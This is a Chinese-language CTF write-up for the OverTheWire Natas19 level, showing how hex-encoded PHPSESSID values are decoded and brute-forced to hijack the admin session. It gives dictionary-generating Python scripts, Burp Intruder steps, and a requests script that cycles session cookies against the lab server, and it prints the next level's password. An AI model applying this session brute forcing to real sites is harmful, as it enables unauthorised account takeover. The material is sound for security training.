Natas19:

提示,与上一题源码类似,只是PHPSESSID不连续。随便输入username和password,抓包观察PHPSESSID,发现是输入的信息,按照id-username的格式,由ascill码转化为16进制,猜测正确PHPSESSID,应该是id-admin,用python构造字典,burp抓包后使用intruder模块,导入字典后进行暴力破解。

方法1:burp破解

1.抓包得到PHPSESSID=3436322d61646d696e

2.将PHPSESSID进行ASCII hex解码(ascill码转化为16进制),发现其值为id-username格式。可以多次抓包尝试,根据结果猜测正确PHPSESSID,应该是id-admin。

3.由于-admin对应的十六进制是2d61646d696e不变,因此我们只需要构造前面的id对应的十六进制即可。0-9十个十位数对应的十六进制为30-39,我们用python构造字典。

字典脚本(生成数字001-699的16进制):

a = []

for i in range(30,37):

    for j in range(30,40):

        for k in range(30,40):

            a.append( '%d%d%d'%(i,j,k))

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

由于前100个id是0-99而不是000-099,我们使用notpad++手动将前100个id生成的16进制数前面的30去掉,得到最终的字典。





1.txt


字典进阶:


上面生成字典的方法太麻烦了,下面脚本可以帮助我们直接生成PHPSESSID值的字典。


Python2.x脚本




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(str(i))+"2d61646d696e"

    a.append(k)

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

# python中,函数 hexlify 作用是返回的二进制数据的十六进制表示。

# 每个字节的数据转换成相应的 2 位十六进制表示。因此产生的字符串是原数据的两倍长度。

# unhexlify 则执行反向操作。




Python3.x脚本:




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(bytes(str(i).encode()))+b"2d61646d696e"

    a.append(k.decode())

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")




关于Python2和Python3的字符编码与界解码问题,看这里


4.下面使用burp开始爆破:








如上图,这个正确结果的length比较特别,既不是所有结果中最长的,也不是最短的,而是一个中间数。我是第一次遇到这种情况,害我找了半天。


另外,如果不想使用python生成脚本,可以直接使用burp的intruder模块中的Cluster bomb模式,将PHPSESSID值的前六位数做3个payload配置,进行爆破。












得到flag:




You are an admin. The credentials for the next level are:

Username: natas20

Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF




方法2:python破解




# coding=utf-8

import requests

import binascii

url = "http://natas19.natas.labs.overthewire.org/"

payload = {"username":"admin","password":"123"}

for i in range(640):

    headers = {"Cookie":"PHPSESSID="+binascii.hexlify(str(i))+"2d61646d696e","Authorization":"Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="}

    req = requests.post(url,params=payload,headers=headers)

    if "You are logged in as a regular user"  in req.text:

        # print(i) #打印i,查看进度

        continue

    else:

        print(i)

        print(req.text)

        exit()







flag:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF


缺点:速度太慢了,可以考虑使用多线程


参考:


https://www.cnblogs.com/ichunqiu/p/9554885.html
https://www.cnblogs.com/liqiuhao/p/6859052.html
												


											
Natas19 Writeup(Session登录,常见编码,暴力破解)的更多相关文章
	

    
						
  1. 服务认证暴力破解工具Crowbar
		
    服务认证暴力破解工具Crowbar   Crowbar是Kali Linux新增的一款服务认证暴力破解工具.该工具支持OpenVPN.RDP.SSH和VNC服务.该工具具备常见的暴力破解功能,如主机字 ...
    
		
    2. 
								
  2. Natas18 Writeup(Session登录,暴力破解)
		
    Natas18: 一个登录界面,查看源码,发现没有连接数据库,使用Session登录,且$maxid设定了不大的上限,选择采取爆破. 源码解析: <html> <head> & ...
    
		
    3. 
						
  3. ssh访问控制,多次失败登录即封掉IP,防止暴力破解
		
    ssh访问控制,多次失败登录即封掉IP,防止暴力破解 一.系统:Centos6.3 64位 二.方法:读取/var/log/secure,查找关键字 Failed,例如(注:文中的IP地址特意做了删减 ...
    
		
    4. 
						
  4. 忘记秘密利用python模拟登录暴力破解秘密
		
    忘记秘密利用python模拟登录暴力破解秘密: #encoding=utf-8 import itertools import string import requests def gen_pwd_f ...
    
		
    5. 
						
  5. [转帖]利用hydra(九头蛇)暴力破解内网windows登录密码
		
    利用hydra(九头蛇)暴力破解内网windows登录密码 https://blog.csdn.net/weixin_37361758/article/details/77939070 尝试了下 能够 ...
    
		
    6. 
						
  6. DEDE暴力破解后台登录页面
		
    DEDE暴力破解后台登录页面 #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ '' ...
    
		
    7. 
						
  7. Linux用root强制踢掉已登录用户;用fail2ban阻止ssh暴力破解root密码
		
    Linux用root强制踢掉已登录用户   首先使用w命令查看所有在线用户: [root@VM_152_184_centos /]# w 20:50:14 up 9 days, 5:58, 3 use ...
    
		
    8. 
						
  8. openssh安装、设置指定端口号、免密码登录、变量传递、防暴力破解
		
    首先确保机器挂在好光盘镜像,然后查看软件包信息 [root@xuegod63 ~]# df -hFilesystem      Size  Used Avail Use% Mounted on/dev ...
    
		
    9. 
						
  9. 暴力破解 安鸾 Writeup
		
    前三题可以使用hydra进行破解 hydra使用教程 https://www.cnblogs.com/zhaijiahui/p/8371336.html D:\soft\hydra-windows&g ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. python的拆包(扫盲)
			
    什么是拆包 拆包: 对于函数中的多个返回数据, 去掉元组, 列表 或者字典 直接获取里面数据的过程. 怎么拆包 1) 对列表进行拆包 my_list = [1, 3.14, "hello&q ...
    
			
    2. 
						
  2. documentFragment深入理解
			
    documentFragment是一个保存多个element的容器对象(保存在内存)当更新其中的一个或者多个element时,页面不会更新.只有当documentFragment容器中保存的所有ele ...
    
			
    3. 
						
  3. struts2和springmvc比较1
			
    其实都是ssh只是一个是struts2+spring3.0+hibernate,而另外一个是 springmvc+spring3.0+hibernate,纵向来看比较struts2和springmvc ...
    
			
    4. 
						
  4. <USACO09DEC>过路费Cow Toll Pathsの思路
			
    啊好气 在洛谷上A了之后 隔壁jzoj总wa 迷茫了很久.发现那题要文件输入输出 生气 肥肠不爽 Description 跟所有人一样,农夫约翰以着宁教我负天下牛,休叫天下牛负我的伟大精神,日日夜夜苦 ...
    
			
    5. 
						
  5. Hessian简介
			
    Hessian Hessian是一个轻量级的remoting onhttp工具,使用简单的方法提供了RMI的功能. 相比WebService,Hessian更简单.快捷.采用的是二进制RPC协议,因为 ...
    
			
    6. 
						
  6. 烘焙ID贴图
			
    ID贴图(ID Map)的作用主要就是用来区分同一个模型中不同的区块,具体的用法查看此文.下面介绍几种不同的方式来烘焙ID贴图,用到的工具分别是Blender和Substance Painter. 在 ...
    
			
    7. 
						
  7. nginx图片过滤处理模块http_image_filter_module安装配置
			
    http_image_filter_module是nginx提供的集成图片处理模块,支持nginx-0.7.54以后的版本,在网站访问量不是很高磁盘有限不想生成多余的图片文件的前提下可,就可以用它实时 ...
    
			
    8. 
						
  8. 利用FinalData恢复shift+delete误删的文件
			
    当前位置 : 首页 » 文章分类 :  生活  »  利用FinalData恢复shift+delete误删的文件 上一篇 有关可变形部件模型(Deformable Part Model)的一些说明  ...
    
			
    9. 
						
  9. OpenGL的矩阵使用——绘制桌子
			
    其中最左边的桌子循环上移(即匀速上移到一定位置后回到原点继续匀速上移),中间的桌子不断旋转(即绕自身中间轴旋转),最右边的桌子循环缩小(即不断缩小到一定大小后回归原来大小继续缩小). 桌子的模型尺寸如 ...
    
			
    10. 
						
  10. K8S实战-构建Django项目-03-使用共享存储
			
    上篇博文,发布之后,正好跟着双十一,不知道大家剁手了没~~.好啦,言归正传先声明一下,每周1,3,5更新教程,大家如果想要了解更多的教程可以重温一下之前的教程或者,关注崔格拉斯 公众号,大家想要源码的 ...
    
			
    11.